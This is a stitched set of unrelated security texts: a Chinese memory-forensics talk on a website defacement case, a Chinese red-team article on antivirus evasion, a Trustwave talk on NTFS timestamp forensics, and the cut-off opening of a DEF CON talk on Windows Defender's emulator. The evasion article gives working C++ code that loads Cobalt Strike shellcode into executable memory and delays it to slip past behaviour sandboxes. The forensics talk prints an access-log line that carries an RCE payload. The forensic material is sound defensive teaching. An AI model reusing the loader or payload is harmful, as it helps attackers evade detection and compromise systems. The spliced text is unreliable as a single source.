MEMORY FORENSICS 识“黑”寻踪 之 内存取证 演讲人:伍智波 (SkyMine) 中国网安 · 广州三零卫士 - 安全专家 2 0 1 8 目录 CONTENTS PART 01 内存取证的起源与发展 01 PART 02 内存管理机制简述 02 PART 03 如何获取内存数据 03 PART 04 内存分析的工具 04 PART 05 犯罪取证案例分析 05 KEYWORD : 应急响应、数字取证、行为溯源 THE ORIGIN AND DEVELOPMENT OF MEMORY FORENSICS PART 01 内存取证的起源与发展 2002年 2005年 2006年 2007年 2009年 2010年 2011年 美国空军特别调查办公室的安全研究员于2002年发表 的DFRWS主题报告中曾经提到,为了处理网络应急响应所 面临的问题,需要调查易失性内存(RAM)的信息,以全 面而准确地获取网络攻击和网络犯罪证据。这是内存取证概 念首次被提出。 DFRWS数字取证研究会于2005年夏季发起针对 Windows操作系统的内存取证分析挑战赛,通过分析一个 Windows 2000的物理内存转储文件,要求参赛者提取该文件 中所包含的隐匿进程及其隐匿方式、网络攻击者如何攻击以及 何时、何处发起攻击等相关攻击链信息。这是真正意义上的内 存取证研究的开始。 USA 2005 2002年 2005年 2006年 2007年 2009年 2010年 2011年 安全研究员Andreas Schustert于2006年提出了在 Windows内存镜像文件中寻找进程和线程的方法,并使用Perl 语言开发了PTFinder,该工具可以找到Windows内存文件的 进程和线程信息。 PTFinder Andreas Schustert 2002年 2005年 2006年 2007年 2009年 2010年 2011年 纽约大学计算机科学与工程系助理教授Brendan Dolan- Gavitt于2008年通过分析Windows的内存获取了注册表信息, 并通过提取注册表信息来判断系统是否受到了攻击。同年, DFRWS继2005年的Windows内存取证分析挑战赛后又发起了 针对Linux系统的内存取证分析挑战赛。 2002年 2005年 2006年 2007年 2009年 2010年 2011年 2009年,加拿大计算机安全研究员Seyed Mahmood Hejazi在DFRWS上提出了从Windows内存中提取敏感信息的 方法,同年,Zhang Shuhui等人提出了一种Kernel Processor Control Region(KPCR)结构的提取方法,学界 对内存取证的研究开始初有成果。 2002年 2005年 2006年 2007年 2009年 2010年 2011年 DESCRIPTION OF THE MEMORY MANAGEMENT MECHANISM PART 02 内存管理机制的简述 ① 虚拟地址空间管理机制 ② 物理页面管理机制 ③ 地址转译和页面交换机制 Windows三大内存管理机制 Windows为满足多进程工作的需要,采用虚拟地址空间 的机制来进行内存管理,每个进程拥有逻辑独立的内存空间, 各进程地址空间相互隔离,互不干扰。 而这些虚拟地址空间是由VAD(Virtual Address Descriptor, 虚拟地址描述符)来管理的,VAD对象描述的是一些连续的 地址空间范围,但由于在整个内存地址空间当中,保留或提 交的地址范围可能是不连续的,所以,Windows会使用AVL树 的方式来管理VAD对象,形成VAD树。 因此,借助VAD,不仅能获取进程所使用的虚拟地址空 间信息,还可以获取到该进程的其他相关信息。 ① 虚拟地址空间管理机制 ② 物理页面管理机制 ③ 地址转译和页面交换机制 Windows三大内存管理机制 由于Windows的进程都是在物理内存中执行的,因此 Windows需要管理物理地址所在的物理内存页面,Windows系 统使用PFN(Page Frame Number Database,页帧数据库)来 描述物理内存各页面的状态,PFN数据库中的每个项都分别 对应一个物理页面,记录了该页面的一些信息。 此外,Windows还维护着一组链表,分别将相同类型的 的页面链接起来,主要包括零化链表、空闲链表、备用链表、 修改链表、坏页面链表等。 ① 虚拟地址空间管理机制 ② 物理页面管理机制 ③ 地址转译和页面交换机制 Windows三大内存管理机制 Windows的的地址转译机制,可将进程中所使用的虚拟 地址转换为物理内存中的物理地址,从而完成内存数据的定 位,为获取内存数据提取支持。 当运行的进程所需的内存大于计算机所安装的RAM时, Windows将会采用页面交互机制来处理,要么进程使用了某 个尚未得到物理页面的虚拟地址,要么进程工作集限制其不 能拥有更多物理页面。 事实上,页面交换文件是物理内存的一种延伸,所以, 完整的内存数据应当包含物理内存数据和页面交换文件数据。 HOW TO GET MEMORY DATA PART 03 如何获取内存数据 内存获取方法 ①基于用户模式程序的内存获取(User level applications) ②基于内核模式程序的内存获取(Kernel level applications) ③基于系统崩溃转储的内存获取(Crash dump technique) ④基于操作系统注入的内存获取(Operating system injection) ⑤基于系统休眠文件的内存获取(Hibernation file based technique) ⑥基于系统冷启动的内存获取(Cold booting) ⑦基于虚拟化快照的内存获取(Virtualization) ⑧基于硬件的内存获取(DMA by Hardware) 基于硬件的内存获取,在事件响应中一 般很少用到,在各种内存获取方法当中,这 种方法的原子性(Atomicity)保持得最低。 内存获取方法 ①基于用户模式程序的内存获取(User level applications) ②基于内核模式程序的内存获取(Kernel level applications) ③基于系统崩溃转储的内存获取(Crash dump technique) ④基于操作系统注入的内存获取(Operating system injection) ⑤基于系统休眠文件的内存获取(Hibernation file based technique) ⑥基于系统冷启动的内存获取(Cold booting) ⑦基于虚拟化快照的内存获取(Virtualization) 基于内核模式程序的内存获取 常用的提取工具:Dumpit , Redline , RamCapturer 等等 基于系统崩溃转储的内存获取 基于虚拟化快照的内存获取 △ Vmware Workstation的虚拟机快照内存vmem文件 △ ESXI的虚拟机快照内存vmem文件 △ ESXI生成快照时必须勾选“生成虚拟机的内存快照” (最佳方法) HOW TO ANALYSIS MEMORY DATA PART 04 内存分析的工具 内存分析工具 主流工具有Rekall,Redline,Volatility等等,目前应用较为广泛、支持较多dump类型的免费内存分析工具(框架)是Volatility。 https://www.volatilityfoundation.org/ Volatility内存分析框架 Volatility自带的分析插件支持分析内存镜 像中保留的历史网络连接信息、历史进程、历 史命令记录等等。 Ex. netscan——历史网络连接信息 psscan——历史进程表 cmdscan——历史命令记录 CASE ANALYSIS OF CRIME COLLECTION PART 05 犯罪取证案例分析 背景:某单位网站遭到页面篡改 2018年3月21日 下午13点21分(已虚假化) 监控中心监测到某单位网站主页遭到页面篡改 情节较为严重,我接到通知后立即赶往现场进行处置。 现场勘查 到达现场勘查后发现,事发服务器是台虚拟机,操作系 统是Windows 2008 R2,网站使用phpstudy集成环境进行部 署,经查看发现,Windows事件日志服务并没有启用。 日志被清 由于该服务器承载着Web服务,且硬件防火墙只对外映 射80端口,初步推断是以Web攻击作为入口的,经查看, apache的accesslog已经遭到清除。 幸运的是,accesslog配置了流式备份,我们在另一台日 志服务器上找到了完整且未失真的accesslog副本。 △被清除过的accesslog,只剩下攻击发生后的访问日志 分析日志 通过针对事发时间(13时21分)左右的accesslog进行分 析后,没有发现任何web攻击,这就很奇怪了,那就说明黑客 并没有直接用webshell发送篡改网页的指令。难道是通过NC 之类的反向连接建立shell来控制? 提取内存 为了求证我对于“黑客是通过反向连接shell来控制” 的 猜想,我分别通过调查开始时生成的虚拟机快照提取了内存镜 像,为了有多个内存样本进行交叉分析,我又使用dumpit工 具提取了内核级的内存完整镜像(物理内存+页面交换文件)。 分析内存 如果黑客确实是通过反向连接shell来实施控制的,那么 肯定曾经建立过一个异常的网络连接,内存中很可能会保留着 这个信息。 我通过Volatility内存分析框架对内存样本进行了网络连接 分析,但在事发时间并没有发现有可疑的网络连接。 诡异的进程 虽然查看历史网络连接没有发现可疑的网络连接行为,但我们提取了内存的历史进程信息时发现,有一个很可疑的程 序在事发时间正在运行,名为update.exe,进程名看起来十分有迷惑性,但我留意到,这个进程足足运行了3天之久,如 果这是一个正常的更新程序,不大可能会持续这么久。 恶意程序分析 从内存中提取出该进程的物理路径后,我找到了这个奇怪 的程序,是位于C盘的一个很深的目录里的,而且在同目录下, 我发现了名为image.jpg的篡改图片,随即,我对这个程序进 行了逆向分析,发现是个易语言程序。 逻辑炸弹 通过对该程序的逆向分析后发现,黑客这次利用了一个相 对比较少见的攻击方式——逻辑炸弹,程序代码中有一个条件 判断,当前时间大于2018年3月21日13点21分就会自动用该 程序目录下的image.jpg替换掉网站根目录的image.jpg,达 成篡改的目的,在确认图片已经篡改成功后将自动退出程序。 寻找入口 当确定这个易语言程序就是黑客用来篡改网页的payload以后,我开始调查这个程序是如何被传入服务器的,前面提 到过,这个web服务器只对外开放80端口,因此有很大可能是通过web应用漏洞来写入这个程序的。通过查看这个程序创 建时间,我们得知了程序的传入时间点,继而在accesslog中寻找这个时间点的web访问记录。 分析入口 在这个传入时间点,我们发现在accesslog中有一些POST请求(菜刀连接特征),指向网站一个上传目录的php文件, 经确认该文件是个webshell,用于上传篡改程序,而accesslog记录的来源IP是个美国的代理地址,并非真实地址,接着我 们继续调查webshell是如何被上传的。 疑犯落网 在accesslog中以webshell的文件名作为关键字进行搜索, 很轻松的就定位到了webshell的上传位置,通过对这个POST 请求的分析,可以确认这个web应用是存在任意代码执行漏洞 的,黑客通过这个漏洞写入了webshell,同时,我们发现了一 个某云服务商的IP地址,后来证实该IP是攻击者所持有。 XX.XX.XX.XX - - [19/Mar/2018:10:00:57 +0800] "POST /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 31 siteid=1&modelid=1&username=3254235&password=1123589&pwd confirm=123456789&email=123%40qq.com&nickname=i09dfdf&info %5Bcontent%5D=href%3Dhttp%3A%2F%2FXX.XX.XX.XX%2Fsuccess.tx t%3F.php%23.jpg&dosubmit=1&protocol="http://XX.XX.XX.XX/index. php?m=member&c=index&a=register&siteid=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" - 事件链还原 2018年3月19日 02:17 黑客初次访问 网站 2018年3月19日 02:32 黑客开始尝试 进行渗透 2018年3月19日 09:57 黑客发现网站 存在RCE漏洞 2018年3月19日 10:00 黑客利用RCE 漏洞写入webshell 2018年3月19日 16:12 黑客webshell 上传篡改程序 2018年3月21日 13:21 篡改程序自动 执行网页篡改 2018年3月21日 14:54 安全专家到场 取证分析 2018年3月21日 20:33 取证分析结束 提交报告 谢谢观看 演讲人:伍智波 (SkyMine) 个人微信,欢迎交流 添加敬请备注: 公司名-姓名
前言 By:Astartes 杀软对抗貌似是个经久不衰的议题,在我看来他是红队必备的基础设施之一,在红队中不可缺少,我想 用这篇文章,尽量用大白话的形式来说一下 "静","动",这篇文章很基础。因为到头来我只讲了如何上 线。同时,这篇文章又与别的文章不太一样,我想从比较基础的东西让初学者知道到底该如何对抗。 静态免杀 首先我们先看下面这段代码,定义了两个数组 这两个数组的不同之处在于 1. 类型不同 Characterarr为字符数组,String为字符串。字符串在后面默认填\0 1. 存放区域不同 字符数组或者小数组存放的位置在栈里,而字符串是常量,在常量区 请一定要注意这两种的格式,字符串由双引号包裹,字符数组由单引号包裹 在汇编里如下 int main() { char Characterarr[] = { '1','2','3','4','5','6' }; char String[] = { "123456" }; return 0; } char Characterarr[] = { '1','2','3','4','5','6' }; 009E512F  mov         byte ptr [Characterarr],31h   009E5133  mov         byte ptr [ebp-0Fh],32h   009E5137  mov         byte ptr [ebp-0Eh],33h   009E513B  mov         byte ptr [ebp-0Dh],34h   009E513F  mov         byte ptr [ebp-0Ch],35h   009E5143  mov         byte ptr [ebp-0Bh],36h   char String[] = { "123456" }; 009E5147  mov         eax,dword ptr [string "123456" (09E7B30h)]   009E514C  mov         dword ptr [String],eax   009E514F  mov         cx,word ptr ds:[9E7B34h]   009E5156  mov         word ptr [ebp-1Ch],cx   在汇编代码里我们可以更清晰的看到 char Characterarr[] = { '1','2','3','4','5','6' }; 是通过mov 把数组里 的值放入了 ebp- 的位置,ebp是栈寄存器。 char String[] = { "123456" }; String确是由09E7B30h这个地址里的值传给eax的 这里的知识其实是C语言的内存四区以及PE结构的知识。如果你不懂,那没关系。 看我下面的操作 我们 可以重新生成一下第一个C语言程序,并且把那两个数组改成下面的 更改的代码如下 在编译好后,用十六进制编辑器打开这个exe,接着去搜索这两个字符数组。 看下图,我只找到了 String的123456123456123456。 同时静态查杀的原因既是如此,如果病毒的特征库里存在123456123456123456这个字符串,存在这个 字符串那他被扫描的时候就可以判断为病毒文件了。通过查找在磁盘中的文件的特征码(这些特征码由 病毒库通过大量分析得出)来进行查杀。 大家伙儿用的最多的cobaltstrike的shellcode,他生成的payload也是以字符串的形式,同样,它也保存 在常量区。 009E515A  mov         dl,byte ptr ds:[9E7B36h]   009E5160  mov         byte ptr [ebp-1Ah],dl   int main() { char Characterarr[] = { '1','2','3','4','5','6' }; char String[] = { "123456123456123456" }; return 0; } 目前大家用到的最多的方式是对shellcode这个字符串加密,加密过后,虽然他依然在常量区,但是已经 不在杀软的特征库里了。 你也可以把他放入到栈里,这里有一个问题是当你的字符数组里的值太多的时 候,或者 选择Release时会给你放到常量区,这是因为编译器会进行优化。 这是我没有进行处理的时候,通过cobaltstrike默认提供的字符串的形式去加载的。火绒直接识别出了特 征 下面的代码是我用来实现栈中存放数据的。 #include <windows.h> #include <iostream> #include <stdio.h> #include <string.h> #include <stdlib.h> char* buf1() {   char buf[] = { '\xfc','\xe8','\x89','\x00','\x00'}; //CS的shellcode太长,这里是 实例 char* charbuf = new char[799]; memcpy(charbuf, buf, 799); return charbuf; } typedef void(__stdcall* CODE) (); int runshellcode() {   char* charbuf = buf1();   PVOID p = NULL;   if ((p = VirtualAlloc(NULL, sizeof(charbuf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)       MessageBoxA(NULL, "申请内存失败", "提醒", MB_OK);   if (!(memcpy(p, charbuf, 799)))       MessageBoxA(NULL, "写内存失败", "提醒", MB_OK); 用栈的方式来实现非常简单,只需要把字符串改成字符数组即可,但是我们要注意编译器选择的栈的大 小,我记得visual studio的默认栈的大小为1MB,如果超出这个大小,则情况未知,因为栈是由编译器 进行维护的,我们是不可控的。 我用的是visual studio 2022 项目为debug版,因为选择Release时会给 你放到常量区,同时我我的shellcode大小为799个, 我在把shellcode放入栈以后立马给了堆里,因为 我怕再多的操作栈会被覆盖。 当然也可以通过编译器的选项来更改栈的大小,visual studio 的设置如下(我的是为默认设置)   CODE code = (CODE)p;   code();   return 0; }   char buf[] = { 's','h','e','l','l'}   //栈里 char* charbuf = new char[799];  //创建个堆,其实这行在上面之前会更好 memcpy(charbuf, buf, 799); //立马拷贝到堆里 return charbuf; 接着我把生成好的文件放入了虚拟机 通过报警提示可以发现,这里的提示是(行为沙盒)。 并不是直接识别出了我们的特征码,到此我们已 经过掉了静态的特征码查杀。 动态查杀 虽然我们已经绕过了静态查杀,但是现在的还是报毒,火绒的行为沙盒的介绍在这里http://www.huoro ng.cn/info/148473162658.html 当然除了火绒之外,其他的杀软也是有行为沙盒的,比如windows defender。 我查阅了大量的资料,很多资料是通过环境探测,父进程,命令参数,等各种方式,这些方 式很好,但是真的不适合真实环境的对抗。 我这边的思路是只要在这个沙盒运行的时候让我们的程序不执行shellcode就好了 这种沙盒是有运行时间的,最多在10ms。因为再长了会很影响用户体验的 我们只要想办法让我们的 shellcode再10ms后运行加载即可。 别用sleep因为sleep会被hook 我想了很多种办法,最后发现还是 这个比较好用。因为它适合各种环境 我这里用的办法是开辟N个很大的堆,然后填充0。接着去打印他 开辟很大的堆这个是刚开始可以直接过windows defender的行为沙盒的。 但是大部分时候我们不知道 对方用的是什么杀软。所以后面的填充0以及打印是一个过沙箱比较通用的方法。(同时他也可以绕过云 上的检测,因为云把你的程序拖到云上机器来进行分析。) 众所周知,输入输出函数效率是很低的。 完 整的代码如下。 #include <windows.h> #include <iostream> #include <stdio.h> #include <string.h> #include <stdlib.h> #pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) char* buf1() {   char buf[] = { "SHELLCODE" };   char* charbuf = new char[799];   memcpy(charbuf, buf, 799);   return charbuf; } typedef void(__stdcall* CODE) (); int runshellcode() {   char* charbuf = buf1();   PVOID p = NULL;   if ((p = VirtualAlloc(NULL, sizeof(charbuf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)       MessageBoxA(NULL, "申请内存失败", "提醒", MB_OK);   if (!(memcpy(p, charbuf, 799)))       MessageBoxA(NULL, "写内存失败", "提醒", MB_OK);   CODE code = (CODE)p;   code();   return 0; } int createheap() //Bypass {   int i = 0;   int j = 0;   char* strpi = NULL;   strpi = (char*)malloc(10000);   for (i = 0; i < 10000; i++)   {       strpi[i] = 0;       printf("%d,%d\n", strpi[i], i);   }   /*   for (j = 0; j < 300; j++)   {       printf("%d,%d\n", strpi[j], j);   }   */   free(strpi);   return 0; } int main() {   int i;   for (i = 0; i < 1000; i++)   {       createheap();   }   if (i == 1000)   {       runshellcode();   }   return 0; 下面测试一下~ }
I’m your MAC(b) Daddy Grayson Lenik – Trustwave @handlefree Copyright Trustwave 2010 Confidential Bio • Security Consultant for Trustwave’s Spiderlabs. • Author of the Digital Forensics blog “An Eye on Forensics” • GIAC Certified Forensic Analyst (GCFA) • Microsoft Certified Systems Engineer (MCSE) • Qualified Security Assessor (QSA) Copyright Trustwave 2010 Confidential Agenda • What are MACB times? • Where are they stored? • What is a forensic timeline? • Why is it useful? • Why do it may way? • Doing it my way • My way just got easier • Timestamp alteration (Timestomping) • Defeating timestamp alteration • Case studies and examples. • Tools • Conclusion Copyright Trustwave 2010 Confidential MAC(b) Times What do they stand for? The MAC(b) times are derived from file system metadata and they stand for: Modified Accessed Changed ($MFT Modified) and Birth (file creation time) The (b) is in parentheses because not all file systems record a birth time. For the purposes of this presentation I focus on the NTFS file system as it is the most common file system we see when working investigations. Copyright Trustwave 2010 Confidential Where are they stored? Two places, both are located in the Master File Table ($MFT): The first is $STANDARD_INFO Attribute. $STANDARD_INFO ($SI) stores file metadata such as flags, the file SID, the file owner and a set of MAC(b) timestamps. $STANDARD_INFO is the timestamp collected by Windows explorer, fls, mactime, timestomp, find and the other utilities related to the display of timestamps. *http://blogs.technet.com/b/ganand/archive/2008/02/19/ntfs-time-stamps-file- created-in-1601-modified-in-1801-and-accessed-in-2008.aspx Copyright Trustwave 2010 Confidential Where are they stored? The second attribute is $FILE_NAME Att. $FILE_NAME ($FN) contains the filename in Unicode and another set of MAC(b) timestamps. The difference? $STANDARD_INFO can be modified by user level processes like timestomp. $FILE_NAME can only be modified by the system kernel. There are no known anti-forensics utilities that can accomplish this. Copyright Trustwave 2010 Confidential What is a forensic timeline? • A forensic timeline is a string of digital events sorted into a format that is easily readable by a human being. • It can contain events from a single source, like the file system itself, or events from multiple sources like the system registry, log files, event logs, etc… • The only way I know of to get a 30,000 foot view of the events that were taking place on a machine during a given time frame. Copyright Trustwave 2010 Confidential Why is it useful? Forensic timelines are infinitely useful at pinpointing all (or most) intruder activity at a given point in time. It is also an excellent place to generate initial case leads and keywords. • Periods of intruder activity stick out like a sore thumb. • Identifying a starting point of intrusion is invaluable to finding other pieces of malware and more of the total activity that took place on the targeted system. • When you add in registry timeline info you get a more complete picture of code being dropped and services being created. In some cases definitive proof of which user id was used to compromise the system. Copyright Trustwave 2010 Confidential Why do it my way? It’s fast… It’s easy… It’s easily searchable so you can use your scalpel instead of your shotgun. It’s free! (more or less) • I can generate a timeline including full file system data and all the registry hives, search it for keywords and identify time altered files before any popular GUI based forensic utilities have loaded and verified an image. • And in a few minutes, I’m going to show you how! Copyright Trustwave 2010 Confidential Doing it my way. Generate a bodyfile with “fls”: Fls is open source and is available as part of The Sleuthkit (TSK)* • Fls –m C: -f ntfs –r \\.\Z: >fs_bodyfile − m Output in standard format (timemachine format) − C: name the mountpoint (could be D:, /var, etc..) − -f <filesystem type> − -r display directories recursively − \\.\Z: point it at a logical device − > dump it out to a file called fs_bodyfile − This can be done on a live file system by using F-response (the only part of this that’s not free, but Oh so worth it.) * http://www.sleuthkit.org/sleuthkit/download.php Copyright Trustwave 2010 Confidential Doing it my way. Fls can also be run against a static (postmortem) image: Like so: • Fls –m C: –o 63 –r <path_to_image> >fs_bodyfile − -o <sector offset where the file system starts in the image.> Or against a split image: Like so: • Fls –m C: -o 63 –r <path_to_image>, <path to image.002>, <path to image.003> >fs_bodyfile − -o <sector offset where the file system starts in the image.> Copyright Trustwave 2010 Confidential Doing it my way. Here’s a snippet of what a bodyfile looks like: It’s not very user friendly. We’re going to see that inetmgr.exe again… 0|C:/WINDOWS/system32/imagehlp.dll|45808-128- 1|r/rrwxrwxrwx|0|0|150016|1294398049|1202272697|1288808002|1181611484 0|C:/WINDOWS/system32/imgutil.dll|53632-128- 1|r/rrwxrwxrwx|0|0|34816|1294399529|1236501098|1288808002|1236501098 0|C:/WINDOWS/system32/inetcomm.dll|39531-128- 1|r/rrwxrwxrwx|0|0|695808|1295017350|1276070390|1288808002|1181612350 0|C:/WINDOWS/system32/inetcpl.cpl|53636-128- 1|r/rrwxrwxrwx|0|0|1469440|1294399448|1284055250|1294399566|123650129 20|C:/WINDOWS/system32/inetinfo.chm|46996-128- 0|r/rrwxrwxrwx|0|0|929955|1099455632|1099455632|1293869074|1099455632 0|C:/WINDOWS/system32/inetmgr.exe|47066-128- 3|r/rrwxrwxrwx|0|0|1301406|1295017321|1068995339|1294399979|106899533 9 Copyright Trustwave 2010 Confidential Doing it my way Turning fls output into something useful and human-readable: Mactime.pl is also available as part of TSK. Perl mactime.pl –d –b fs_bodyfile >fs_timeline.csv -d output in comma delimited format -b <path to bodyfile> > output to a file called fs_timeline.csv Copyright Trustwave 2010 Confidential Doing it my way. Your timeline displayed in Excel. Copyright Trustwave 2010 Confidential Doing it my way. Adding information to make it a “super” timeline. • I like to add registry times and little else, adding too much information can make the timeline difficult to interpret. (Data Overload) However, there are times when more data is great. • Adding registry MAC times is accomplished with the use of “regtime” • Regtime.pl is a perl script written by Harlan Carvey and is included in the Sans Incident Response and Forensics Toolkit (SIFT) • Log2timeline is a great utility written by Kristinn Gudjonsson for adding in Windows event logs, Dr. Watson logs, IIS and Apache logs and any number of other things. (The latest version contains 32 input modules.) In between writing this presentation and now delivering it, Kristinn has released a new version that makes my entire presentation obsolete. Thanks a lot . We’ll talk more about L2T in just a minute. Copyright Trustwave 2010 Confidential Doing it my way. The process: Extract the registry hives from %systemroot%/Windows/System32/config and the ntuser.dat files from their respective profiles in C:\Documents and Settings\<username> (Windows XP), C:\Users\<username> (Windows Vista and 7). Perl regtime.pl –m <hivename> -r <filepath> The <hivename> variables are: HKLM/SAM, HKLM/SECURITY, HKLM/Software, HKLM/SYSTEM and HKEY_USER Copyright Trustwave 2010 Confidential Doing it my way So. Perl regtime.pl –m HKLM/SAM –r C:\Cases\registry\SAM >>fs_bodyfile The double >> will append your new output to the end of the previous bodyfile. Using a single > will crush the data you already have in your bodyfile, I always make a copy of the fs-body first…just in case. Repeat for each hive file and NTUSER.DAT you want to add… Run mactime again. Perl mactime.pl –d –b fs_bodyfile >super_timeline.csv Copyright Trustwave 2010 Confidential Doing it my way. And there you have it. A human-readable timeline including registry keys in a sortable, searchable CSV file (easily opened in Excel). The .csv format is also searchable via the UNIX grep command as well as many other stackable commands. C:\tools\strings super_timeline.csv |grep –i inetmgr.exe Sun Nov 16 2003 08:08:59,1301406,m..b,r/rrwxrwxrwx,0,0,47066-128-3,C:/WINDOWS/system32/inetmgr.exe Mon Apr 23 2007 10:53:45,19456,m...,r/rrwxrwxrwx,0,0,37482-128-3,C:/WINDOWS/system32/inetsrv/inetmgr.exe Mon Jun 11 2007 19:36:29,19456,...b,r/rrwxrwxrwx,0,0,37482-128-3,C:/WINDOWS/system32/inetsrv/inetmgr.exe Tue Jun 12 2007 09:47:42,0,m...,0,0,0,0,HKLM/Software/Microsoft/Windows/CurrentVersion/App Paths/inetmgr.exe Wed Nov 03 2010 12:01:34,19456,.a..,r/rrwxrwxrwx,0,0,37482-128-3,C:/WINDOWS/system32/inetsrv/inetmgr.exe Wed Nov 03 2010 12:13:37,19456,..c.,r/rrwxrwxrwx,0,0,37482-128-3,C:/WINDOWS/system32/inetsrv/inetmgr.exe Fri Jan 07 2011 04:32:59,1301406,..c.,r/rrwxrwxrwx,0,0,47066-128-3,C:/WINDOWS/system32/inetmgr.exe Fri Jan 14 2011 08:02:01,1301406,.a..,r/rrwxrwxrwx,0,0,47066-128-3,C:/WINDOWS/system32/inetmgr.exe Copyright Trustwave 2010 Confidential Timestamp Alteration (Timestomping) There are a couple of interesting things to notice on the previous slide. • Inetmgr.exe has 2 separate locations on this server. The one in ~/inetsrv/ is a valid location. %systemroot%Windows/System32/ is not. − The binary in /System32 is malware. • The date on that binary does not fit the rest of our system timeline, this server wasn’t even put into production until 2007. − Sun Nov 16 2003 08:08:59,1301406,m..b,r/rrwxrwxrwx,0,0,47066-128- 3,C:/WINDOWS/system32/inetmgr.exe − How do we find out if this has been altered or if it is just an anomaly? Copyright Trustwave 2010 Confidential Timestamp Alteration (Timestomping) Some strong words from Vincent Liu, the creator of Timestomp, in an interview with CIO magazine May of 2007. • “…But forensic people don’t know how good or bad their tools are, and they’re going to court based on evidence gathered with those tools. You should test the validity of the tools you’re using before you go to court. That’s what we’ve done, and guess what? These tools can be fooled. We’ve proven that. − I agree, tools can be fooled. Good investigators cannot. • “For any case that relies on digital forensic evidence, Liu says, It would be a cakewalk to come in and blow the case up. I can take any machine and make it look guilty, or not guilty. Whatever I want.” − I beg to differ. Copyright Trustwave 2010 Confidential Defeating Timestamp Alteration Proving Mr. Liu wrong. Remember that second set of attributes in the $MFT? $FILE_NAME? • AS of the writing of this presentation there is nothing known that can change these attributes on a live system. • How do we get at those attributes and make some sense out of the $MFT? − Harlan Carvey to the rescue (again)! • Harlan has written a script called mft.pl that he recently made publicly available on www.regripper.net. This script parses out the data related to the MAC(B) attributes and outputs it in a (mostly) human-readable format. Copyright Trustwave 2010 Confidential Defeating Timestamp Alteration Ripping the $MFT • Perl mft.pl c:\cases\registry\$MFT >ripped_mft.txt − Simply outputs a .txt file containing the MAC(B) attributes stored in both $STANDARD_INFO and $FILE_NAME • A little more grep-fu and we’ve got what we need. − Strings ripped_mft.txt |grep –C 6 –i inetmgr.exe • -C 6 show 6 lines of context surrounding the search hit • -i ignore case Copyright Trustwave 2010 Confidential Defeating Timestamp Alteration -- M: Sun Nov 16 15:08:59 2003 Z Look familiar? A: Fri Jan 14 15:02:01 2011 Z C: Fri Jan 7 11:32:59 2011 Z B: Sun Nov 16 15:08:59 2003 Z 0x0030 112 0 0x0000 0x0000 FN: inetmgr.exe Parent Ref: 2783 Parent Seq: 1 $F_N M: Wed Jul 21 17:40:21 2010 Z Unaltered MAC(B) A: Wed Jul 21 17:40:21 2010 Z C: Wed Jul 21 17:40:21 2010 Z B: Wed Jul 21 17:40:21 2010 Z Unaltered MAC(B) 0x0080 72 1 0x0000 0x0000 Copyright Trustwave 2010 Confidential Defeating Timestamp Alteration Interpreting the output of our search. The result of the 6 lines before and after the filename “inetmgr” are the MAC(b) times from $STANDARD_INFO showing the suspect Modifed and Birth times and the MAC(b) times from the $FILE_NAME attribute which shows the accurate birth date and time of the file. • Definitive evidence of time alteration! • The second set of timestamps blows away the use of timestomp. • Trustwave is encountering the use of this regularly in our investigations. Copyright Trustwave 2010 Confidential My way just got easier The latest version of log2timeline has added functionality that automates virtually everything I just talked about. c:\perl\log2timeline\log2timeline.pl -r <directory> -z <timezone> -f <logtype> -w <outfile.csv> • Version .60 runs on Windows as well as Linux • It will automatically parse the registry hives, event logs, the $MFT, IIS logs and just about anything else you can think of. • Nice work Kristinn, soon nobody will need me at all. Copyright Trustwave 2010 Confidential Demo Time • Create a super timeline from a postmortem image using fls, regtime and mactime. • Perform a string search for known malicious files in that timeline. • Verify timestamps of recovered files by comparing $SI and $FN from the $MFT Copyright Trustwave 2010 Confidential Tools Tools used and credit to their creators: Regtime.pl and mft.pl Harlan Carvey. Author of “Windows Forensic Analysis”, “Windows Registry Forensics” and the supporting “Windows Incident Response” blog. http://windowsir.blogspot.com Fls and mactime.pl Brian Carrier. Author of “Filesystem Forensic Analysis” and the creator of “The Sleuth Kit” http://www.sleuthkit.org Log2timeline Kristinn Gudjonsson. Author GCFA Gold paper “Mastering the Super Timeline With log2timeline” and the forensics blog “IR and Forensic talk” http://blog.kiddaland.net Copyright Trustwave 2010 Confidential Tools More tools used and credit to their creators. • The original mac_daddy was written by Rob Lee and was absorbed into mactime by Brian Carrier. It’s only fair to mention Rob since he is The original MAC(b) daddy. • Special thanks to Chris Pogue (@cpbeefcake) for teaching me his “Sniper Forensics” methodology and always having the time to mentor me, even when he doesn’t have the time to mentor me. Copyright Trustwave 2010 Confidential Conclusion Real world anti-forensics. In the course of real world investigations we regularly encounter malware and attackers that are using anti-forensics techniques in an attempt to obfuscate their trail. As attackers start to use these tools more regularly, the investigators that work the cases need to be better armed and prepared to recognize and defeat their methods. • Everything leaves trace evidence somewhere, so know how your tools work and not just that they do. (Locard’s Exchange Principle) • Remember that the tools do not make the investigator, it’s the investigators use of the tools that make them effective. • Be aware that these tactics are in use. Questions?? Thank You! Glenik@trustwave.com http://eyeonforensics.blogspot.com/ @handlefree
Windows Offender: Reverse Engineering Windows Defender's Antivirus Emulator Alexei Bulazel @0xAlexei DEF CON 26 About Me ● Security researcher at ForAllSecure ● Firmware RE & cyber policy at River Loop Security ● RPI / RPISEC alumnus ● First time speaking at DEF CON! @0xAlexei This is my personal research, any views and opinions expressed are my own, not those of any employer This Presentation Is... ● A deeply technical look at Windows Defender Antivirus’ binary emulator internals
 ● As far as I know, the first conference talk about reverse engineering any antivirus software’s binary emulator This Presentation Is... ● A deeply technical look at Windows Defender Antivirus’ binary emulator internals
 ● As far as I know, the first conference talk about reverse engineering any antivirus software’s binary emulator This Presentation Is Not… ● An evaluation of Windows Defender Antivirus’ efficacy as an antivirus product
